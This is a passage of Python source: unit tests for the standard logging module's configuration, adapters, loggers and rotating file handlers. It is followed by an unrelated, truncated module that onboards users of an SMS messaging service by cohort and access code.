logging.disable()
self.assertEqual(logging.root.manager.disable, logging.CRITICAL)
def _test_log(self, method, level=None):
called = []
support.patch(self, logging, 'basicConfig',
lambda *a, **kw: called.append((a, kw)))
recording = RecordingHandler()
logging.root.addHandler(recording)
log_method = getattr(logging, method)
if level is not None:
log_method(level, "test me: %r", recording)
else:
log_method("test me: %r", recording)
self.assertEqual(len(recording.records), 1)
record = recording.records[0]
self.assertEqual(record.getMessage(), "test me: %r" % recording)
expected_level = level if level is not None else getattr(logging, method.upper())
self.assertEqual(record.levelno, expected_level)
# basicConfig was not called!
self.assertEqual(called, [])
def test_log(self):
self._test_log('log', logging.ERROR)
def test_debug(self):
self._test_log('debug')
def test_info(self):
self._test_log('info')
def test_warning(self):
self._test_log('warning')
def test_error(self):
self._test_log('error')
def test_critical(self):
self._test_log('critical')
def test_set_logger_class(self):
self.assertRaises(TypeError, logging.setLoggerClass, object)
class MyLogger(logging.Logger):
pass
logging.setLoggerClass(MyLogger)
self.assertEqual(logging.getLoggerClass(), MyLogger)
logging.setLoggerClass(logging.Logger)
self.assertEqual(logging.getLoggerClass(), logging.Logger)
def test_subclass_logger_cache(self):
# bpo-37258
message = []
class MyLogger(logging.getLoggerClass()):
def __init__(self, name='MyLogger', level=logging.NOTSET):
super().__init__(name, level)
message.append('initialized')
logging.setLoggerClass(MyLogger)
logger = logging.getLogger('just_some_logger')
self.assertEqual(message, ['initialized'])
stream = io.StringIO()
h = logging.StreamHandler(stream)
logger.addHandler(h)
try:
logger.setLevel(logging.DEBUG)
logger.debug("hello")
self.assertEqual(stream.getvalue().strip(), "hello")
stream.truncate(0)
stream.seek(0)
logger.setLevel(logging.INFO)
logger.debug("hello")
self.assertEqual(stream.getvalue(), "")
finally:
logger.removeHandler(h)
h.close()
logging.setLoggerClass(logging.Logger)
@support.requires_type_collecting
def test_logging_at_shutdown(self):
# Issue #20037
code = """if 1:
import logging
class A:
def __del__(self):
try:
raise ValueError("some error")
except Exception:
logging.exception("exception in __del__")
a = A()"""
rc, out, err = assert_python_ok("-c", code)
err = err.decode()
self.assertIn("exception in __del__", err)
self.assertIn("ValueError: some error", err)
def test_recursion_error(self):
# Issue 36272
code = """if 1:
import logging
def rec():
logging.error("foo")
rec()
rec()"""
rc, out, err = assert_python_failure("-c", code)
err = err.decode()
self.assertNotIn("Cannot recover from stack overflow.", err)
self.assertEqual(rc, 1)
class LogRecordTest(BaseTest):
def test_str_rep(self):
r = logging.makeLogRecord({})
s = str(r)
self.assertTrue(s.startswith('<LogRecord: '))
self.assertTrue(s.endswith('>'))
def test_dict_arg(self):
h = RecordingHandler()
r = logging.getLogger()
r.addHandler(h)
d = {'less' : 'more' }
logging.warning('less is %(less)s', d)
self.assertIs(h.records[0].args, d)
self.assertEqual(h.records[0].message, 'less is more')
r.removeHandler(h)
h.close()
def test_multiprocessing(self):
r = logging.makeLogRecord({})
self.assertEqual(r.processName, 'MainProcess')
try:
import multiprocessing as mp
r = logging.makeLogRecord({})
self.assertEqual(r.processName, mp.current_process().name)
except ImportError:
pass
def test_optional(self):
r = logging.makeLogRecord({})
NOT_NONE = self.assertIsNotNone
NOT_NONE(r.thread)
NOT_NONE(r.threadName)
NOT_NONE(r.process)
NOT_NONE(r.processName)
log_threads = logging.logThreads
log_processes = logging.logProcesses
log_multiprocessing = logging.logMultiprocessing
try:
logging.logThreads = False
logging.logProcesses = False
logging.logMultiprocessing = False
r = logging.makeLogRecord({})
NONE = self.assertIsNone
NONE(r.thread)
NONE(r.threadName)
NONE(r.process)
NONE(r.processName)
finally:
logging.logThreads = log_threads
logging.logProcesses = log_processes
logging.logMultiprocessing = log_multiprocessing
class BasicConfigTest(unittest.TestCase):
"""Test suite for logging.basicConfig."""
def setUp(self):
super(BasicConfigTest, self).setUp()
self.handlers = logging.root.handlers
self.saved_handlers = logging._handlers.copy()
self.saved_handler_list = logging._handlerList[:]
self.original_logging_level = logging.root.level
self.addCleanup(self.cleanup)
logging.root.handlers = []
def tearDown(self):
for h in logging.root.handlers[:]:
logging.root.removeHandler(h)
h.close()
super(BasicConfigTest, self).tearDown()
def cleanup(self):
setattr(logging.root, 'handlers', self.handlers)
logging._handlers.clear()
logging._handlers.update(self.saved_handlers)
logging._handlerList[:] = self.saved_handler_list
logging.root.setLevel(self.original_logging_level)
def test_no_kwargs(self):
logging.basicConfig()
# handler defaults to a StreamHandler to sys.stderr
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.StreamHandler)
self.assertEqual(handler.stream, sys.stderr)
formatter = handler.formatter
# format defaults to logging.BASIC_FORMAT
self.assertEqual(formatter._style._fmt, logging.BASIC_FORMAT)
# datefmt defaults to None
self.assertIsNone(formatter.datefmt)
# style defaults to %
self.assertIsInstance(formatter._style, logging.PercentStyle)
# level is not explicitly set
self.assertEqual(logging.root.level, self.original_logging_level)
def test_strformatstyle(self):
with support.captured_stdout() as output:
logging.basicConfig(stream=sys.stdout, style="{")
logging.error("Log an error")
sys.stdout.seek(0)
self.assertEqual(output.getvalue().strip(),
"ERROR:root:Log an error")
def test_stringtemplatestyle(self):
with support.captured_stdout() as output:
logging.basicConfig(stream=sys.stdout, style="$")
logging.error("Log an error")
sys.stdout.seek(0)
self.assertEqual(output.getvalue().strip(),
"ERROR:root:Log an error")
def test_filename(self):
def cleanup(h1, h2, fn):
h1.close()
h2.close()
os.remove(fn)
logging.basicConfig(filename='test.log')
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.FileHandler)
expected = logging.FileHandler('test.log', 'a')
self.assertEqual(handler.stream.mode, expected.stream.mode)
self.assertEqual(handler.stream.name, expected.stream.name)
self.addCleanup(cleanup, handler, expected, 'test.log')
def test_filemode(self):
def cleanup(h1, h2, fn):
h1.close()
h2.close()
os.remove(fn)
logging.basicConfig(filename='test.log', filemode='wb')
handler = logging.root.handlers[0]
expected = logging.FileHandler('test.log', 'wb')
self.assertEqual(handler.stream.mode, expected.stream.mode)
self.addCleanup(cleanup, handler, expected, 'test.log')
def test_stream(self):
stream = io.StringIO()
self.addCleanup(stream.close)
logging.basicConfig(stream=stream)
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.StreamHandler)
self.assertEqual(handler.stream, stream)
def test_format(self):
logging.basicConfig(format='foo')
formatter = logging.root.handlers[0].formatter
self.assertEqual(formatter._style._fmt, 'foo')
def test_datefmt(self):
logging.basicConfig(datefmt='bar')
formatter = logging.root.handlers[0].formatter
self.assertEqual(formatter.datefmt, 'bar')
def test_style(self):
logging.basicConfig(style='$')
formatter = logging.root.handlers[0].formatter
self.assertIsInstance(formatter._style, logging.StringTemplateStyle)
def test_level(self):
old_level = logging.root.level
self.addCleanup(logging.root.setLevel, old_level)
logging.basicConfig(level=57)
self.assertEqual(logging.root.level, 57)
# Test that second call has no effect
logging.basicConfig(level=58)
self.assertEqual(logging.root.level, 57)
def test_incompatible(self):
assertRaises = self.assertRaises
handlers = [logging.StreamHandler()]
stream = sys.stderr
assertRaises(ValueError, logging.basicConfig, filename='test.log',
stream=stream)
assertRaises(ValueError, logging.basicConfig, filename='test.log',
handlers=handlers)
assertRaises(ValueError, logging.basicConfig, stream=stream,
handlers=handlers)
# Issue 23207: test for invalid kwargs
assertRaises(ValueError, logging.basicConfig, loglevel=logging.INFO)
# Should pop both filename and filemode even if filename is None
logging.basicConfig(filename=None, filemode='a')
def test_handlers(self):
handlers = [
logging.StreamHandler(),
logging.StreamHandler(sys.stdout),
logging.StreamHandler(),
]
f = logging.Formatter()
handlers[2].setFormatter(f)
logging.basicConfig(handlers=handlers)
self.assertIs(handlers[0], logging.root.handlers[0])
self.assertIs(handlers[1], logging.root.handlers[1])
self.assertIs(handlers[2], logging.root.handlers[2])
self.assertIsNotNone(handlers[0].formatter)
self.assertIsNotNone(handlers[1].formatter)
self.assertIs(handlers[2].formatter, f)
self.assertIs(handlers[0].formatter, handlers[1].formatter)
def _test_log(self, method, level=None):
# logging.root has no handlers so basicConfig should be called
called = []
old_basic_config = logging.basicConfig
def my_basic_config(*a, **kw):
old_basic_config()
old_level = logging.root.level
logging.root.setLevel(100) # avoid having messages in stderr
self.addCleanup(logging.root.setLevel, old_level)
called.append((a, kw))
support.patch(self, logging, 'basicConfig', my_basic_config)
log_method = getattr(logging, method)
if level is not None:
log_method(level, "test me")
else:
log_method("test me")
# basicConfig was called with no arguments
self.assertEqual(called, [((), {})])
def test_log(self):
self._test_log('log', logging.WARNING)
def test_debug(self):
self._test_log('debug')
def test_info(self):
self._test_log('info')
def test_warning(self):
self._test_log('warning')
def test_error(self):
self._test_log('error')
def test_critical(self):
self._test_log('critical')
class LoggerAdapterTest(unittest.TestCase):
def setUp(self):
super(LoggerAdapterTest, self).setUp()
old_handler_list = logging._handlerList[:]
self.recording = RecordingHandler()
self.logger = logging.root
self.logger.addHandler(self.recording)
self.addCleanup(self.logger.removeHandler, self.recording)
self.addCleanup(self.recording.close)
def cleanup():
logging._handlerList[:] = old_handler_list
self.addCleanup(cleanup)
self.addCleanup(logging.shutdown)
self.adapter = logging.LoggerAdapter(logger=self.logger, extra=None)
def test_exception(self):
msg = 'testing exception: %r'
exc = None
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.adapter.exception(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.ERROR)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
self.assertEqual(record.exc_info,
(exc.__class__, exc, exc.__traceback__))
def test_exception_excinfo(self):
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.adapter.exception('exc_info test', exc_info=exc)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.exc_info,
(exc.__class__, exc, exc.__traceback__))
def test_critical(self):
msg = 'critical test! %r'
self.adapter.critical(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.CRITICAL)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
def test_is_enabled_for(self):
old_disable = self.adapter.logger.manager.disable
self.adapter.logger.manager.disable = 33
self.addCleanup(setattr, self.adapter.logger.manager, 'disable',
old_disable)
self.assertFalse(self.adapter.isEnabledFor(32))
def test_has_handlers(self):
self.assertTrue(self.adapter.hasHandlers())
for handler in self.logger.handlers:
self.logger.removeHandler(handler)
self.assertFalse(self.logger.hasHandlers())
self.assertFalse(self.adapter.hasHandlers())
def test_nested(self):
class Adapter(logging.LoggerAdapter):
prefix = 'Adapter'
def process(self, msg, kwargs):
return f"{self.prefix} {msg}", kwargs
msg = 'Adapters can be nested, yo.'
adapter = Adapter(logger=self.logger, extra=None)
adapter_adapter = Adapter(logger=adapter, extra=None)
adapter_adapter.prefix = 'AdapterAdapter'
self.assertEqual(repr(adapter), repr(adapter_adapter))
adapter_adapter.log(logging.CRITICAL, msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.CRITICAL)
self.assertEqual(record.msg, f"Adapter AdapterAdapter {msg}")
self.assertEqual(record.args, (self.recording,))
orig_manager = adapter_adapter.manager
self.assertIs(adapter.manager, orig_manager)
self.assertIs(self.logger.manager, orig_manager)
temp_manager = object()
try:
adapter_adapter.manager = temp_manager
self.assertIs(adapter_adapter.manager, temp_manager)
self.assertIs(adapter.manager, temp_manager)
self.assertIs(self.logger.manager, temp_manager)
finally:
adapter_adapter.manager = orig_manager
self.assertIs(adapter_adapter.manager, orig_manager)
self.assertIs(adapter.manager, orig_manager)
self.assertIs(self.logger.manager, orig_manager)
class LoggerTest(BaseTest):
def setUp(self):
super(LoggerTest, self).setUp()
self.recording = RecordingHandler()
self.logger = logging.Logger(name='blah')
self.logger.addHandler(self.recording)
self.addCleanup(self.logger.removeHandler, self.recording)
self.addCleanup(self.recording.close)
self.addCleanup(logging.shutdown)
def test_set_invalid_level(self):
self.assertRaises(TypeError, self.logger.setLevel, object())
def test_exception(self):
msg = 'testing exception: %r'
exc = None
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.logger.exception(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.ERROR)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
self.assertEqual(record.exc_info,
(exc.__class__, exc, exc.__traceback__))
def test_log_invalid_level_with_raise(self):
with support.swap_attr(logging, 'raiseExceptions', True):
self.assertRaises(TypeError, self.logger.log, '10', 'test message')
def test_log_invalid_level_no_raise(self):
with support.swap_attr(logging, 'raiseExceptions', False):
self.logger.log('10', 'test message') # no exception happens
def test_find_caller_with_stack_info(self):
called = []
support.patch(self, logging.traceback, 'print_stack',
lambda f, file: called.append(file.getvalue()))
self.logger.findCaller(stack_info=True)
self.assertEqual(len(called), 1)
self.assertEqual('Stack (most recent call last):\n', called[0])
def test_make_record_with_extra_overwrite(self):
name = 'my record'
level = 13
fn = lno = msg = args = exc_info = func = sinfo = None
rv = logging._logRecordFactory(name, level, fn, lno, msg, args,
exc_info, func, sinfo)
for key in ('message', 'asctime') + tuple(rv.__dict__.keys()):
extra = {key: 'some value'}
self.assertRaises(KeyError, self.logger.makeRecord, name, level,
fn, lno, msg, args, exc_info,
extra=extra, sinfo=sinfo)
def test_make_record_with_extra_no_overwrite(self):
name = 'my record'
level = 13
fn = lno = msg = args = exc_info = func = sinfo = None
extra = {'valid_key': 'some value'}
result = self.logger.makeRecord(name, level, fn, lno, msg, args,
exc_info, extra=extra, sinfo=sinfo)
self.assertIn('valid_key', result.__dict__)
def test_has_handlers(self):
self.assertTrue(self.logger.hasHandlers())
for handler in self.logger.handlers:
self.logger.removeHandler(handler)
self.assertFalse(self.logger.hasHandlers())
def test_has_handlers_no_propagate(self):
child_logger = logging.getLogger('blah.child')
child_logger.propagate = False
self.assertFalse(child_logger.hasHandlers())
def test_is_enabled_for(self):
old_disable = self.logger.manager.disable
self.logger.manager.disable = 23
self.addCleanup(setattr, self.logger.manager, 'disable', old_disable)
self.assertFalse(self.logger.isEnabledFor(22))
def test_root_logger_aliases(self):
root = logging.getLogger()
self.assertIs(root, logging.root)
self.assertIs(root, logging.getLogger(None))
self.assertIs(root, logging.getLogger(''))
self.assertIs(root, logging.getLogger('foo').root)
self.assertIs(root, logging.getLogger('foo.bar').root)
self.assertIs(root, logging.getLogger('foo').parent)
self.assertIsNot(root, logging.getLogger('\0'))
self.assertIsNot(root, logging.getLogger('foo.bar').parent)
def test_invalid_names(self):
self.assertRaises(TypeError, logging.getLogger, any)
self.assertRaises(TypeError, logging.getLogger, b'foo')
def test_pickling(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
for name in ('', 'root', 'foo', 'foo.bar', 'baz.bar'):
logger = logging.getLogger(name)
s = pickle.dumps(logger, proto)
unpickled = pickle.loads(s)
self.assertIs(unpickled, logger)
def test_caching(self):
root = self.root_logger
logger1 = logging.getLogger("abc")
logger2 = logging.getLogger("abc.def")
# Set root logger level and ensure cache is empty
root.setLevel(logging.ERROR)
self.assertEqual(logger2.getEffectiveLevel(), logging.ERROR)
self.assertEqual(logger2._cache, {})
# Ensure cache is populated and calls are consistent
self.assertTrue(logger2.isEnabledFor(logging.ERROR))
self.assertFalse(logger2.isEnabledFor(logging.DEBUG))
self.assertEqual(logger2._cache, {logging.ERROR: True, logging.DEBUG: False})
self.assertEqual(root._cache, {})
self.assertTrue(logger2.isEnabledFor(logging.ERROR))
# Ensure root cache gets populated
self.assertEqual(root._cache, {})
self.assertTrue(root.isEnabledFor(logging.ERROR))
self.assertEqual(root._cache, {logging.ERROR: True})
# Set parent logger level and ensure caches are emptied
logger1.setLevel(logging.CRITICAL)
self.assertEqual(logger2.getEffectiveLevel(), logging.CRITICAL)
self.assertEqual(logger2._cache, {})
# Ensure logger2 uses parent logger's effective level
self.assertFalse(logger2.isEnabledFor(logging.ERROR))
# Set level to NOTSET and ensure caches are empty
logger2.setLevel(logging.NOTSET)
self.assertEqual(logger2.getEffectiveLevel(), logging.CRITICAL)
self.assertEqual(logger2._cache, {})
self.assertEqual(logger1._cache, {})
self.assertEqual(root._cache, {})
# Verify logger2 follows parent and not root
self.assertFalse(logger2.isEnabledFor(logging.ERROR))
self.assertTrue(logger2.isEnabledFor(logging.CRITICAL))
self.assertFalse(logger1.isEnabledFor(logging.ERROR))
self.assertTrue(logger1.isEnabledFor(logging.CRITICAL))
self.assertTrue(root.isEnabledFor(logging.ERROR))
# Disable logging in manager and ensure caches are clear
logging.disable()
self.assertEqual(logger2.getEffectiveLevel(), logging.CRITICAL)
self.assertEqual(logger2._cache, {})
self.assertEqual(logger1._cache, {})
self.assertEqual(root._cache, {})
# Ensure no loggers are enabled
self.assertFalse(logger1.isEnabledFor(logging.CRITICAL))
self.assertFalse(logger2.isEnabledFor(logging.CRITICAL))
self.assertFalse(root.isEnabledFor(logging.CRITICAL))
class BaseFileTest(BaseTest):
"Base class for handler tests that write log files"
def setUp(self):
BaseTest.setUp(self)
fd, self.fn = tempfile.mkstemp(".log", "test_logging-2-")
os.close(fd)
self.rmfiles = []
def tearDown(self):
for fn in self.rmfiles:
os.unlink(fn)
if os.path.exists(self.fn):
os.unlink(self.fn)
BaseTest.tearDown(self)
def assertLogFile(self, filename):
"Assert a log file is there and register it for deletion"
self.assertTrue(os.path.exists(filename),
msg="Log file %r does not exist" % filename)
self.rmfiles.append(filename)
class FileHandlerTest(BaseFileTest):
def test_delay(self):
os.unlink(self.fn)
fh = logging.FileHandler(self.fn, delay=True)
self.assertIsNone(fh.stream)
self.assertFalse(os.path.exists(self.fn))
fh.handle(logging.makeLogRecord({}))
self.assertIsNotNone(fh.stream)
self.assertTrue(os.path.exists(self.fn))
fh.close()
class RotatingFileHandlerTest(BaseFileTest):
def next_rec(self):
return logging.LogRecord('n', logging.DEBUG, 'p', 1,
self.next_message(), None, None, None)
def test_should_not_rollover(self):
# If maxbytes is zero rollover never occurs
rh = logging.handlers.RotatingFileHandler(self.fn, maxBytes=0)
self.assertFalse(rh.shouldRollover(None))
rh.close()
def test_should_rollover(self):
rh = logging.handlers.RotatingFileHandler(self.fn, maxBytes=1)
self.assertTrue(rh.shouldRollover(self.next_rec()))
rh.close()
def test_file_created(self):
# checks that the file is created and assumes it was created
# by us
rh = logging.handlers.RotatingFileHandler(self.fn)
rh.emit(self.next_rec())
self.assertLogFile(self.fn)
rh.close()
def test_rollover_filenames(self):
def namer(name):
return name + ".test"
rh = logging.handlers.RotatingFileHandler(
self.fn, backupCount=2, maxBytes=1)
rh.namer = namer
rh.emit(self.next_rec())
self.assertLogFile(self.fn)
rh.emit(self.next_rec())
self.assertLogFile(namer(self.fn + ".1"))
rh.emit(self.next_rec())
self.assertLogFile(namer(self.fn + ".2"))
self.assertFalse(os.path.exists(namer(self.fn + ".3")))
rh.close()
@support.requires_zlib
def test_rotator(self):
def namer(name):
return name + ".gz"
def rotator(source, dest):
with open(source, "rb") as sf:
data = sf.read()
compressed = zlib.compress(data, 9)
with open(dest, "wb") as df:
df.write(compressed)
os.remove(source)
rh = logging.handlers.RotatingFileHandler(
self.fn, backupCount=2, maxBytes=1)
rh.rotator = rotator
rh.namer = namer
m1 = self.next_rec()
rh.emit(m1)
self.assertLogFile(self.fn)
m2 = self.next_rec()
rh.emit(m2)
fn = namer(self.fn + ".1")
self.assertLogFile(fn)
newline = os.linesep
with open(fn, "rb") as f:
compressed = f.read()
data = zlib.decompress(compressed)
self.assertEqual(data.decode("ascii"), m1.msg + newline)
rh.emit(self.next_rec())
fn = namer(self.fn + ".2")
self.assertLogFile(fn)
with open(fn, "rb") as f:
compressed = f.read()
data = zlib.decompress(compressed)
self.assertEqual(data.decode("ascii"), m1.msg + newline)
rh.emit(self.next_rec())
fn = namer(self.fn + ".2")
with open(fn, "rb") as f:
compressed = f.read()
data = zlib.decompress(compressed)
self.assertEqual(data.decode("ascii"), m2.msg + newline)
self.assertFalse(os.path.exists(namer(self.fn + ".3")))
rh.close()
class TimedRotatingFileHandlerTest(BaseFileTest):
# other test methods added below
def test_rollover(self):
fh = logging.handlers.TimedRotatingFileHandler(self.fn, 'S',
backupCount=1)
fmt = logging.Formatter('%(asctime)s %(message)s')
fh.setFormatter(fmt)
r1 = logging.makeLogRecord({'msg': 'testing - initial'})
fh.emit(r1)
self.assertLogFile(self.fn)
time.sleep(1.1) # a little over a second ...
r2 = logging.makeLogRecord({'msg': 'testing - after delay'})
fh.emit(r2)
fh.close()
# At this point, we should have a recent rotated file which we
# can test for the existence of. However, in practice, on some
# machines which run really slowly, we don't know how far back
# in time to go to look for the log file. So, we go back a fair
# bit, and stop as soon as we see a rotated file. In theory this
# could of course still fail, but the chances are lower.
found = False
now = datetime.datetime.now()
GO_BACK = 5 * 60 # seconds
for secs in range(GO_BACK):
prev = now - datetime.timedelta(seconds=secs)
fn = self.fn + prev.strftime(".%Y-%m-%d_%H-%M-%S")
found = os.path.exists(fn)
if found:
self.rmfiles.append(fn)
break
msg = 'No rotated files found, went back %d seconds' % GO_BACK
if not found:
# print additional diagnostics
dn, fn = os.path.split(self.fn)
files = [f for f in os.listdir(dn) if f.startswith(fn)]
print('Test time: %s' % now.strftime("%Y-%m-%d %H-%M-%S"), file=sys.stderr)
print('The only matching files are: %s' % files, file=sys.stderr)
for f in files:
print('Contents of %s:' % f)
path = os.path.join(dn, f)
with open(path, 'r') as tf:
print(tf.read())
self.assertTrue(found, msg=msg)
def test_invalid(self):
assertRaises = self.assertRaises
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'X', delay=True)
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'W', delay=True)
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'W7', delay=True)
def test_compute_rollover_daily_attime(self):
currentTime = 0
atTime = datetime.time(12, 0, 0)
rh = logging.handlers.TimedRotatingFileHandler(
self.fn, when='MIDNIGHT', interval=1, backupCount=0, utc=True,
atTime=atTime)
try:
actual = rh.computeRollover(currentTime)
self.assertEqual(actual, currentTime + 12 * 60 * 60)
actual = rh.computeRollover(currentTime + 13 * 60 * 60)
self.assertEqual(actual, currentTime + 36 * 60 * 60)
finally:
rh.close()
#@unittest.skipIf(True, 'Temporarily skipped while failures investigated.')
def test_compute_rollover_weekly_attime(self):
currentTime = int(time.time())
today = currentTime - currentTime % 86400
atTime = datetime.time(12, 0, 0)
wday = time.gmtime(today).tm_wday
for day in range(7):
rh = logging.handlers.TimedRotatingFileHandler(
self.fn, when='W%d' % day, interval=1, backupCount=0, utc=True,
atTime=atTime)
try:
if wday > day:
# The rollover day has already passed this week, so we
# go over into next week
expected = (7 - wday + day)
else:
expected = (day - wday)
# At this point expected is in days from now, convert to seconds
expected *= 24 * 60 * 60
# Add in the rollover time
expected += 12 * 60 * 60
# Add in adjustment for today
expected += today
actual = rh.computeRollover(today)
if actual != expected:
print('failed in timezone: %d' % time.timezone)
print('local vars: %s' % locals())
self.assertEqual(actual, expected)
if day == wday:
# goes into following week
expected += 7 * 24 * 60 * 60
actual = rh.computeRollover(today + 13 * 60 * 60)
if actual != expected:
print('failed in timezone: %d' % time.timezone)
print('local vars: %s' % locals())
self.assertEqual(actual, expected)
finally:
rh.close()
def secs(**kw):
return datetime.timedelta(**kw) // datetime.timedelta(seconds=1)
for when, exp in (('S', 1),
('M', 60),
('H', 60 * 60),
('D', 60 * 60 * 24),
('MIDNIGHT', 60 * 60 * 24),
# current time (epoch start) is a Thursday, W0 means Monday
('W0', secs(days=4, hours=24)),
):
def test_compute_rollover(self, when=when, exp=exp):
rh = logging.handlers.TimedRotatingFileHandler(
self.fn, when=when, interval=1, backupCount=0, utc=True)
currentTime = 0.0
actual = rh.computeRollover(currentTime)
if exp != actual:
# Failures occur on some systems for MIDNIGHT and W0.
# Print detailed calculation for MIDNIGHT so we can try to see
# what's going on
if when == 'MIDNIGHT':
try:
if rh.utc:
t = time.gmtime(currentTime)
else:
t = time.localtime(currentTime)
currentHour = t[3]
currentMinute = t[4]
currentSecond = t[5]
# r is the number of seconds left between now and midnight
r = logging.handlers._MIDNIGHT - ((currentHour * 60 +
currentMinute) * 60 +
currentSecond)
result = currentTime + r
print('t: %s (%s)' % (t, rh.utc), file=sys.stderr)
print('currentHour: %s' % currentHour, file=sys.stderr)
print('currentMinute: %s' % currentMinute, file=sys.stderr)
print('currentSecond: %s' % currentSecond, file=sys.stderr)
print('r: %s' % r, file=sys.stderr)
print('result: %s' % result, file=sys.stderr)
except Exception:
print('exception in diagnostic code: %s' % sys.exc_info()[1], file=sys.stderr)
self.assertEqual(exp, actual)
rh.close()
setattr(TimedRotatingFileHandlerTest, "test_compute_rollover_%s" % when, test_compute_rollover)
@unittest.skipUnless(win32evtlog, 'win32evtlog/win32evtlogutil/pywintypes required for this test.')
class NTEventLogHandlerTest(BaseTest):
def test_basic(self):
logtype = 'Application'
elh = win32evtlog.OpenEventLog(None, logtype)
num_recs = win32evtlog.GetNumberOfEventLogRecords(elh)
try:
h = logging.handlers.NTEventLogHandler('test_logging')
except pywintypes.error as e:
if e.winerror == 5: # access denied
raise unittest.SkipTest('Insufficient privileges to run test')
raise
r = logging.makeLogRecord({'msg': 'Test Log Message'})
h.handle(r)
h.close()
# Now see if the event is recorded
self.assertLess(num_recs, win32evtlog.GetNumberOfEventLogRecords(elh))
flags = win32evtlog.EVENTLOG_BACKWARDS_READ | \
win32evtlog.EVENTLOG_SEQUENTIAL_READ
found = False
GO_BACK = 100
events = win32evtlog.ReadEventLog(elh, flags, GO_BACK)
for e in events:
if e.SourceName != 'test_logging':
continue
msg = win32evtlogutil.SafeFormatMessage(e, logtype)
if msg != 'Test Log Message\r\n':
continue
found = True
break
msg = 'Record not found in event log, went back %d records' % GO_BACK
self.assertTrue(found, msg=msg)
class MiscTestCase(unittest.TestCase):
def test__all__(self):
blacklist = {'logThreads', 'logMultiprocessing',
'logProcesses', 'currentframe',
'PercentStyle', 'StrFormatStyle', 'StringTemplateStyle',
'Filterer', 'PlaceHolder', 'Manager', 'RootLogger',
'root', 'threading'}
support.check__all__(self, logging, blacklist=blacklist)
# Set the locale to the platform-dependent default. I have no idea
# why the test does this, but in any case we save the current locale
# first and restore it at the end.
@support.run_with_locale('LC_ALL', '')
def test_main():
tests = [
BuiltinLevelsTest, BasicFilterTest, CustomLevelsAndFiltersTest,
HandlerTest, MemoryHandlerTest, ConfigFileTest, SocketHandlerTest,
DatagramHandlerTest, MemoryTest, EncodingTest, WarningsTest,
ConfigDictTest, ManagerTest, FormatterTest, BufferingFormatterTest,
StreamHandlerTest, LogRecordFactoryTest, ChildLoggerTest,
QueueHandlerTest, ShutdownTest, ModuleLevelMiscTest, BasicConfigTest,
LoggerAdapterTest, LoggerTest, SMTPHandlerTest, FileHandlerTest,
RotatingFileHandlerTest, LastResortTest, LogRecordTest,
ExceptionTest, SysLogHandlerTest, IPv6SysLogHandlerTest, HTTPHandlerTest,
NTEventLogHandlerTest, TimedRotatingFileHandlerTest,
UnixSocketHandlerTest, UnixDatagramHandlerTest, UnixSysLogHandlerTest,
MiscTestCase
]
if hasattr(logging.handlers, 'QueueListener'):
tests.append(QueueListenerTest)
support.run_unittest(*tests)
if __name__ == "__main__":
test_main()
|
new_user.py
|
from time import sleep
from threading import Thread
from mongolia.errors import DatabaseConflictError
from conf.settings import BYPASS_START_WORDS
from constants.exceptions import BadPhoneNumberError
from backend.outgoing.dispatcher import (send_welcome, send_waitlist,
send_bad_access_code, send_pending)
from constants.parser_consts import START_WORDS
from database.backbone.cohorts import Cohort, ID_KEY
from database.tracking.access_codes import AccessCode
from database.tracking.users import User, Status
from utils.formatters import parser_format, phone_humanize
from utils.codes import looks_like_an_access_code
from backend.features.schedule_features import run_on_user_creation_schedules
from backend.admin_portal.common_helpers import raise_400_error, validate_cohort
from utils.logging import log_warning
from utils.time import now
from constants.cohorts import CohortStatus
def new_user_via_sms(phonenum, ic_number, message_text, curr_time, delay=True):
cohort = Cohort(ic_numbers=ic_number)
# Access codes not deployed
#if cohort["access_code_required"] or looks_like_an_access_code(message_text):
# user = handle_access_code(phonenum, ic_number, cohort, message_text)
if cohort["enableable_from_sms"] and (parser_format(message_text) in START_WORDS or BYPASS_START_WORDS):
user = User.create(phonenum, cohort[ID_KEY], status=Status.active)
else:
user = User.create(phonenum, cohort[ID_KEY], status=Status.pending)
user["needs_review"] = True
#TODO: refactor following two lines
user["custom_attributes"] = cohort["custom_attributes"]
user.save()
#if cohort["status"] == CohortStatus.active:
if user["status"] == Status.active:
onboard_user(user, curr_time, delay)
elif user["status"] == Status.pending and cohort["enableable_from_sms"]: send_pending(user)
# Should not hit these two lines yet, since we don't have waitlist/invalid currently implemented
elif user["status"] == Status.waitlist: send_waitlist(user)
elif user["status"] == Status.invalid: send_bad_access_code(user)
return user
def handle_access_code(phonenum, ic_number, cohort, message_text):
access_code = parser_format(message_text).upper()
access_code = AccessCode.retrieve(access_code)
if access_code is None or not access_code.valid(ic_number):
user = User.create(phonenum, cohort[ID_KEY], status=Status.invalid)
return user
access_code_cohort = access_code.get_cohort()
if access_code_cohort is not None: cohort = access_code_cohort
user = User.create(phonenum, cohort[ID_KEY], status=Status.active)
user["access_code"] = access_code[ID_KEY]
access_code["user"] = user["phonenum"]
user.save()
access_code.save()
return user
def handle_access_code_resubmit(user, message_text):
curr_time = now()
access_code = parser_format(message_text).upper()
access_code = AccessCode.retrieve(access_code)
if access_code is None or not access_code.valid(user["ic_number"]):
return False
